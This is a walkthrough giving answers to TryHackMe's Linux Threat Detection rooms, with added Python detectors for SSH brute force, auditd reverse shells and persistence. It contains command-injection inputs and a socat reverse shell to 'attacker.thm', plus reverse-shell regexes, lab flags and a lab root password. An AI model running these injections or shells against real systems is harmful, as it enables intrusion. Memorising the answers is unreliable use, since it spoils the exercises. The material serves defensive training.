Linux Threat Detection 1, 2, 3 | TryHackMe Walkthrough Answers

This walkthrough follows the three TryHackMe Linux Threat Detection rooms and covers how attackers compromise Linux systems, from the initial breach to their final actions, and how each stage can be detected in system logs. It starts with how intruders gain access, for example by exploiting vulnerable services, stealing credentials or brute-forcing SSH, and shows how these attempts appear in authentication and system logs. It then moves to the attackers' first actions after gaining entry (running reconnaissance commands, escalating privileges, adding backdoors or downloading malicious tools) and the log indicators that reveal them. Finally, it covers the later stages of an attack, where adversaries exfiltrate data, move laterally within the network and attempt to erase traces of their presence, and how such behaviour shows up in audit trails and system records. By understanding the full attack lifecycle and recognising its footprints in Linux logs, defenders can detect, investigate and respond to intrusions more effectively.


Jawstar

10/20/2025, 4 min read

Task 1 : Introduction

Learning Objectives

  • Understand the role and risk of SSH in Linux environments

  • Learn how Internet-exposed services can lead to breaches

  • Utilize process tree analysis to identify the origin of the attack

  • Practice detecting Initial Access techniques in realistic labs

Task 2 : Initial Access via SSH

When did the ubuntu user log in via SSH for the first time? (Answer Example: 2023-09-16)

2023-09-16

Did the ubuntu user use SSH keys instead of a password for the above found date? (Yea/Nay)

Yea

When did the SSH password brute force start? (Answer Format: 2023-09-15)

2025-08-21

Which four users did the botnet attempt to breach? (Separate by a comma, in alphabetical order)

root, roy, sol, user

Finally, which IP managed to breach the root user?

91.224.92.79
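
To show where the answers above come from in the log, here is an added example (my code, not the room's or TryHackMe's) that parses OpenSSH auth-log lines and answers the same questions: a user's first login and the auth method it used, when a brute force started (five failures from one IP inside 60 seconds, a threshold I chose), which usernames that IP tried, and which logins it later got accepted. The SAMPLE_AUTH_LOG lines, hostnames, users and IPs are constructed for the demo; the year is assumed because syslog timestamps omit it.

```python
"""Added example (not from the TryHackMe room): answering the SSH questions
above from OpenSSH auth-log lines with a small parser.

SAMPLE_AUTH_LOG is constructed for the demo; its hostnames, users, IPs and
timestamps are made up and are not the room's data."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed /var/log/auth.log excerpt (syslog format has no year; 2025 is assumed below).
SAMPLE_AUTH_LOG = """\
Aug 20 09:12:01 web1 sshd[1201]: Accepted publickey for ubuntu from 203.0.113.10 port 50122 ssh2: ED25519 SHA256:abc
Aug 21 03:14:07 web1 sshd[2310]: Failed password for root from 198.51.100.7 port 41000 ssh2
Aug 21 03:14:09 web1 sshd[2312]: Failed password for invalid user roy from 198.51.100.7 port 41002 ssh2
Aug 21 03:14:11 web1 sshd[2314]: Failed password for invalid user sol from 198.51.100.7 port 41004 ssh2
Aug 21 03:14:13 web1 sshd[2316]: Failed password for invalid user user from 198.51.100.7 port 41006 ssh2
Aug 21 03:14:15 web1 sshd[2318]: Failed password for root from 198.51.100.7 port 41008 ssh2
Aug 21 03:14:17 web1 sshd[2320]: Failed password for root from 198.51.100.7 port 41010 ssh2
Aug 21 03:20:40 web1 sshd[2402]: Accepted password for root from 198.51.100.7 port 41230 ssh2
Aug 22 08:00:00 web1 sshd[2550]: Accepted password for ubuntu from 203.0.113.10 port 50200 ssh2
"""

# sshd's "Accepted <method> for <user>" / "Failed <method> for [invalid user] <user>" messages.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_auth_log(text, year=2025):
    """Turn sshd auth lines into dicts sorted by time; other auth.log lines (sudo, cron, PAM) are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append({"ts": ts, "result": m["result"], "method": m["method"],
                       "user": m["user"], "ip": m["ip"]})
    return sorted(events, key=lambda e: e["ts"])


def first_login(events, user):
    """(date, auth method) of the earliest Accepted login for `user`, or None."""
    for e in events:
        if e["result"] == "Accepted" and e["user"] == user:
            return e["ts"].date().isoformat(), e["method"]
    return None


def brute_force_start(events, threshold=5, window_seconds=60):
    """Earliest (timestamp, ip) at which one IP produced `threshold` failures within `window_seconds`."""
    failures = defaultdict(list)
    for e in events:
        if e["result"] == "Failed":
            failures[e["ip"]].append(e["ts"])
    best = None
    for ip, times in failures.items():
        times.sort()
        for i in range(len(times) - threshold + 1):          # sliding window over this IP's failures
            if (times[i + threshold - 1] - times[i]).total_seconds() <= window_seconds:
                if best is None or times[i] < best[0]:
                    best = (times[i], ip)
                break
    return best


def targeted_users(events, ip):
    """Usernames the given IP tried and failed to log in as, alphabetically (the botnet's wordlist)."""
    return sorted({e["user"] for e in events if e["result"] == "Failed" and e["ip"] == ip})


def successful_logins_from(events, ip):
    """Every Accepted login from `ip`: the breach is a success that follows a failure burst from the same IP."""
    return [(e["ts"].isoformat(), e["user"], e["method"])
            for e in events if e["result"] == "Accepted" and e["ip"] == ip]


if __name__ == "__main__":
    ev = parse_auth_log(SAMPLE_AUTH_LOG)
    print("first ubuntu login:", first_login(ev, "ubuntu"))
    start = brute_force_start(ev)
    print("brute force started:", start)
    print("users tried:", targeted_users(ev, start[1]))
    print("logins from that IP:", successful_logins_from(ev, start[1]))
```

On a journald-only host the same message text comes from `journalctl -u ssh` (Ubuntu's unit name); `last` and `lastlog` only show successful logins, so the Failed lines are what reveal the botnet and the usernames it guessed.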

Task 3 : Detecting SSH Attacks

What is the path to the Python file the attacker attempted to open?

/opt/trypingme/main.py

Looking inside the opened file, what's the flag you see there?

THM{i_am_vulnerable!}

Task 4 : Initial Access via Services

Task 5 : Detecting Service Breach

What is the PPID of the suspicious whoami command?

1018

Moving up the tree, what is the PID of the TryPingMe app?

577

Which program did the attacker use to open a reverse shell?

Python

Task 6 : Advanced Initial Access

Which Initial Access technique is likely used if a trusted app suddenly runs malicious commands?

Supply Chain Compromise

Which detection method can you use to detect a variety of Initial Access techniques?

Process Tree Analysis

Task 7 : Conclusion

Key Takeaways

  • Attacks on SSH are widespread, but they are easy to detect via authentication logs

  • Exposed services are always a risk since they can lead to a whole Linux compromise

  • Check out the Bulletproof Penguin room to learn how to harden and secure Linux servers

  • While phishing is not common on Linux, human-led and supply chain attacks are still possible

  • Process tree analysis is your best approach in identifying the Initial Access techniques

Linux Threat Detection 2 Answers

Task 2 : Discovery Overview

What is the path of the script that initiated the "hostname" command?

/home/itsupport/debug.sh

What was the last Discovery command launched by the script?

ps -eo pid,ppid,cmd,%mem,%cpu --sort=-%cpu

Looking at the script content, what's the email of the script author?

greg@tryhackme.thm

Task 3 : Detecting Discovery

Run systemd-detect-virt to detect the system's cloud.
What is the command's output you discovered?

Amazon

Now run ps aux and look for EDR or antivirus processes.
What is the full path to the detected antimalware binary?

/var/lib/ultrasec/malscan

Task 4 : Motivation for Attacks

From which domain was the Elastic agent downloaded?

artifacts.elastic.co

What is the full path to the downloaded "helper.sh" script?

/var/tmp/helper.sh

Which of the downloaded files is more likely to be malicious: the one downloaded with curl or the one downloaded with wget?

curl

Task 5 : Dota3: First Actions

Which IP address managed to brute-force the exposed SSH?

45.9.148.125

Which command did the attacker use to list the last logged-in users?

last

Which three EDR processes did the attacker look for with "egrep"?
Answer Format: Separated by a comma, in alphabetical order.

ds_agent,falcon,sentinel

Task 6 : Dota3: Miner Setup

What is the name of the malicious archive that was transferred via SCP?

kernupd.tar.gz

What was the full command line of the cryptominer launch?

nohup /tmp/.apt/kernupd/kernupd

Which IP address range did the attacker scan for an exposed SSH? (Answer Example: 10.0.0.1-10.0.0.126)

10.10.12.1-10.10.12.10

Task 7 : Conclusion

Key Takeaways

  • "Hack and Forget" attacks are usually automated and performed at scale by botnets

  • In Linux, all attack stages mostly rely on prebuilt commands like ls, cat, wget, and ssh

  • Your best approach in detecting malicious commands is auditd and process tree analysis

Linux Threat Detection 3 Answers

Task 2 : Reverse Shells

Run 127.0.0.1 && whoami in the TryPingMe web app.
What output do you see after the ping results?

svctrypingme

Now try spawning a reverse shell to the imaginary "attacker.thm" address.
Run 127.0.0.1 && socat TCP:attacker.thm:1337 EXEC:sh in the web app.
What is the flag returned in the TryPingMe response?

THM{revshells_practitioner!}

Now look at the exported auditd logs at /home/ubuntu/scenario.
Which IP spawned a similar reverse shell via the TryPingMe app?

10.14.105.255
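
The TryPingMe reverse-shell question above and the process tree questions in Task 5 of the first room (PPID of whoami, PID of the app, program used for the reverse shell) are the same exercise: join auditd's SYSCALL and EXECVE records, walk the ppid chain up to the exposed service, and read the remote host out of the command line. Here is an added example that does that (my code, not the room's or TryHackMe's). SAMPLE_AUDIT_LOG, its pids, paths and the 198.51.100.23 address are constructed for the demo, and the detection regexes are my own assumptions rather than a complete list of reverse-shell forms.

```python
"""Added example (not from the TryHackMe room): rebuilding the process tree from
raw auditd records and pulling the remote host out of reverse-shell command
lines spawned by an exposed service.

SAMPLE_AUDIT_LOG, its pids, paths and the 198.51.100.23 address are constructed
for the demo; the detection regexes are my own assumptions, not a complete list."""
import re
from collections import defaultdict


def _hex(s):
    # auditd hex-encodes any execve argument containing a space or a quote (uppercase hex, unquoted).
    return s.encode().hex().upper()


# Constructed records in the raw audit.log format; real SYSCALL lines carry more fields.
SAMPLE_AUDIT_LOG = f"""\
type=SYSCALL msg=audit(1694873000.100:100): arch=c000003e syscall=59 success=yes exit=0 ppid=1 pid=577 uid=999 comm="python3" exe="/usr/bin/python3" key="exec"
type=EXECVE msg=audit(1694873000.100:100): argc=2 a0="/usr/bin/python3" a1="/opt/trypingme/main.py"
type=SYSCALL msg=audit(1694873100.200:101): arch=c000003e syscall=59 success=yes exit=0 ppid=577 pid=1018 uid=999 comm="sh" exe="/usr/bin/dash" key="exec"
type=EXECVE msg=audit(1694873100.200:101): argc=3 a0="sh" a1="-c" a2={_hex('ping -c 1 127.0.0.1 && whoami')}
type=SYSCALL msg=audit(1694873100.201:102): arch=c000003e syscall=59 success=yes exit=0 ppid=1018 pid=1019 uid=999 comm="whoami" exe="/usr/bin/whoami" key="exec"
type=EXECVE msg=audit(1694873100.201:102): argc=1 a0="whoami"
type=SYSCALL msg=audit(1694873200.300:103): arch=c000003e syscall=59 success=yes exit=0 ppid=577 pid=1030 uid=999 comm="sh" exe="/usr/bin/dash" key="exec"
type=EXECVE msg=audit(1694873200.300:103): argc=3 a0="sh" a1="-c" a2={_hex('ping -c 1 127.0.0.1 && socat TCP:198.51.100.23:1337 EXEC:sh')}
type=SYSCALL msg=audit(1694873200.301:104): arch=c000003e syscall=59 success=yes exit=0 ppid=1030 pid=1031 uid=999 comm="socat" exe="/usr/bin/socat" key="exec"
type=EXECVE msg=audit(1694873200.301:104): argc=3 a0="socat" a1="TCP:198.51.100.23:1337" a2="EXEC:sh"
"""

MSG_RE = re.compile(r"msg=audit\(([\d.]+):(\d+)\)")   # (timestamp, serial) shared by one event's records
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')          # key=value or key="value"
ARG_RE = re.compile(r"^a\d+$")                         # a0, a1, ... argv fields of an EXECVE record


def _decode_arg(value):
    """EXECVE args are either "quoted" or hex-encoded; return the plain string either way."""
    if value.startswith('"'):
        return value[1:-1]
    try:
        return bytes.fromhex(value).decode("utf-8", "replace")
    except ValueError:
        return value


def parse_audit_log(text):
    """Join the SYSCALL and EXECVE records that share a serial into one exec event per process."""
    by_serial = defaultdict(dict)
    for line in text.splitlines():
        m = MSG_RE.search(line)
        if not m:
            continue
        rec, fields = by_serial[int(m.group(2))], dict(FIELD_RE.findall(line))
        if fields.get("type") == "SYSCALL":
            rec.update(ts=float(m.group(1)), pid=int(fields["pid"]), ppid=int(fields["ppid"]),
                       comm=fields["comm"].strip('"'), exe=fields["exe"].strip('"'))
        elif fields.get("type") == "EXECVE":   # only EXECVE a<n> fields are argv strings
            args = {k: _decode_arg(v) for k, v in fields.items() if ARG_RE.match(k)}
            rec["argv"] = [args[k] for k in sorted(args, key=lambda k: int(k[1:]))]
    return [r for _, r in sorted(by_serial.items()) if "pid" in r and "argv" in r]


# (regex over the joined command line, group holding the remote host or None) - assumed rules
REVERSE_SHELL_RULES = [
    (re.compile(r"\bsocat\b.*\bTCP4?:([^:\s]+):\d+\b.*\bEXEC:"), 1),
    (re.compile(r"/dev/tcp/([^/\s]+)/\d+"), 1),
    (re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-[ec]\s+\S*sh\b"), None),
]


def reverse_shell_remote(argv):
    """(matched, remote_host) for one command line; host is None when the rule cannot extract it."""
    cmd = " ".join(argv)
    for rule, group in REVERSE_SHELL_RULES:
        m = rule.search(cmd)
        if m:
            return True, (m.group(group) if group else None)
    return False, None


def ancestry(tree, pid):
    """Walk ppid links upward: [(pid, comm, argv), ...] from the process to the top-most known ancestor."""
    chain, seen = [], set()
    while pid in tree and pid not in seen:
        seen.add(pid)
        e = tree[pid]
        chain.append((e["pid"], e["comm"], e["argv"]))
        pid = e["ppid"]
    return chain


def find_reverse_shells(text):
    """Flag reverse-shell execs and name the service at the top of their process tree."""
    events = parse_audit_log(text)
    tree = {e["pid"]: e for e in events}   # last exec per pid; a real tool must also key on time (pid reuse)
    hits = []
    for e in events:
        matched, remote = reverse_shell_remote(e["argv"])
        if matched:
            origin = ancestry(tree, e["pid"])[-1]
            hits.append({"pid": e["pid"], "ppid": e["ppid"], "comm": e["comm"], "remote": remote,
                         "origin_pid": origin[0], "origin_cmd": " ".join(origin[2])})
    return hits


if __name__ == "__main__":
    for h in find_reverse_shells(SAMPLE_AUDIT_LOG):
        print(h)
```

The same join is what `ausearch -i` does for you interactively; doing it in code lets you run the rules over an exported log such as the /home/ubuntu/scenario files and get the originating service's PID and the callback address in one pass.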

Task 3 : Privilege Escalation

Which command line was used to look for the "pass" keyword in files?

grep -iR pass .

Which command line was used to escalate privileges to root?

su root

Looking at the detected .env file, what was the root password?

nGql1pQkGa

Task 4 : Startup Persistence

What flag did you get after running the malware persisting as a service?

THM{hidden_penguin!}

What flag did you get after running the malware persisting as a cron job?

THM{ressurect_on_reboot!}

Task 5 : Account Persistence

Which user was created and added to the sudo group?

koichi

Which file was changed to allow SSH key persistence?

/root/.ssh/authorized_keys
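
The two persistence tasks above boil down to a handful of host artifacts: a new login-capable account, a user added to sudo, a new key in a user's authorized_keys, a cron job and a service unit. Here is an added example (my code, not the room's or TryHackMe's) that diffs a baseline snapshot of those artifacts against the current state and reports each foothold. BASELINE and CURRENT are constructed for the demo; the `helper` user, the key blobs, the `/var/tmp/.cache/updater` path and `updater.service` are made up. On a real host you would fill the same dict from `/etc/passwd`, `/etc/group`, each user's `authorized_keys`, `crontab -l -u <user>` and `systemctl list-unit-files`.

```python
"""Added example (not from the TryHackMe room): diffing two host snapshots to
surface persistence footholds (new sudo-capable accounts, new SSH keys, new cron
jobs and new systemd units).

BASELINE and CURRENT are constructed for the demo; user names, key blobs, paths
and unit names are made up and are not the room's data."""

NOLOGIN = ("/usr/sbin/nologin", "/bin/false", "/sbin/nologin")
ADMIN_GROUPS = ("sudo", "wheel", "admin")


def parse_passwd(text):
    """/etc/passwd -> {name: (uid, shell)}."""
    users = {}
    for line in text.splitlines():
        if line and not line.startswith("#"):
            name, _pw, uid, _gid, _gecos, _home, shell = line.split(":", 6)
            users[name] = (int(uid), shell)
    return users


def parse_group(text):
    """/etc/group -> {group: set(members)}."""
    groups = {}
    for line in text.splitlines():
        if line and not line.startswith("#"):
            name, _pw, _gid, members = line.split(":", 3)
            groups[name] = {m for m in members.split(",") if m}
    return groups


def key_entries(text):
    """authorized_keys -> set of (type, blob); options and comments are ignored so a re-labelled key still matches."""
    keys = set()
    for line in text.splitlines():
        parts = line.split()
        for i, p in enumerate(parts):
            if p.startswith(("ssh-", "ecdsa-", "sk-")) and i + 1 < len(parts):
                keys.add((p, parts[i + 1]))
                break
    return keys


def diff_persistence(baseline, current):
    """List of (category, detail) findings where `current` gained a persistence foothold over `baseline`."""
    findings = []
    old_users, new_users = parse_passwd(baseline["passwd"]), parse_passwd(current["passwd"])
    for name, (uid, shell) in new_users.items():
        if name not in old_users and shell not in NOLOGIN:
            findings.append(("new_login_account", f"{name} uid={uid} shell={shell}"))
        elif name in old_users and old_users[name][1] in NOLOGIN and shell not in NOLOGIN:
            findings.append(("shell_enabled", f"{name} {old_users[name][1]} -> {shell}"))
    old_groups, new_groups = parse_group(baseline["group"]), parse_group(current["group"])
    for g in ADMIN_GROUPS:                     # membership gained in any admin group
        for member in sorted(new_groups.get(g, set()) - old_groups.get(g, set())):
            findings.append(("admin_group_member", f"{member} added to {g}"))
    for user, text in current["authorized_keys"].items():
        added = key_entries(text) - key_entries(baseline["authorized_keys"].get(user, ""))
        for ktype, blob in sorted(added):
            findings.append(("new_ssh_key", f"{user}: {ktype} {blob[:16]}..."))
    for owner, text in current["crontabs"].items():
        old = set(baseline["crontabs"].get(owner, "").splitlines())
        for line in text.splitlines():
            if line.strip() and not line.startswith("#") and line not in old:
                findings.append(("new_cron_job", f"{owner}: {line}"))
    for unit in sorted(set(current["units"]) - set(baseline["units"])):
        findings.append(("new_systemd_unit", unit))
    return findings


# Constructed snapshots: BASELINE is the clean host, CURRENT is after an intruder set up persistence.
BASELINE = {
    "passwd": "root:x:0:0:root:/root:/bin/bash\n"
              "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
              "ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash\n",
    "group": "root:x:0:\nsudo:x:27:ubuntu\n",
    "authorized_keys": {"root": "",
                        "ubuntu": "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleUbuntuKey0000000000000000 ubuntu@laptop\n"},
    "crontabs": {"root": "# m h dom mon dow command\n0 3 * * * /usr/bin/apt-get update\n"},
    "units": ["ssh.service", "cron.service", "trypingme.service"],
}
CURRENT = {
    "passwd": BASELINE["passwd"] + "helper:x:1001:1001::/home/helper:/bin/bash\n",
    "group": "root:x:0:\nsudo:x:27:ubuntu,helper\n",
    "authorized_keys": {"root": "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQExampleAttackerKey000000000 attacker\n",
                        "ubuntu": BASELINE["authorized_keys"]["ubuntu"]},
    "crontabs": {"root": BASELINE["crontabs"]["root"] + "@reboot /var/tmp/.cache/updater\n"},
    "units": BASELINE["units"] + ["updater.service"],
}

if __name__ == "__main__":
    for category, detail in diff_persistence(BASELINE, CURRENT):
        print(f"{category:20} {detail}")
```

Each finding maps to one of the room's questions: the account and sudo findings to the created user, the key finding to the changed authorized_keys, and the cron and unit findings to the two ways the malware was made to survive a reboot. Comparing key blobs rather than whole lines matters because an attacker can hide a key behind a familiar-looking comment.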

Task 6 : Targeted Attacks and Recap

Does Linux ransomware exist and impact organizations worldwide? (Yea/Nay)

Yea

Should you learn Linux threats even if working with Windows? (Yea/Nay)

Yea

Task 7 : Conclusion

Throughout a series of scenarios and real-world examples, you explored more complex, targeted Linux attacks: How adversaries overcome access constraints, how they maintain long-term persistence, and what goals they pursue.
Many SOC teams skip Linux monitoring, but now you know why it's a dangerous blind spot and are prepared to detect complete attack chains in a SIEM or directly on the host. We hope the auditd practice wasn't too painful, and that you enjoyed the Linux Threat Detection journey!

If you want to support me, subscribe to my website.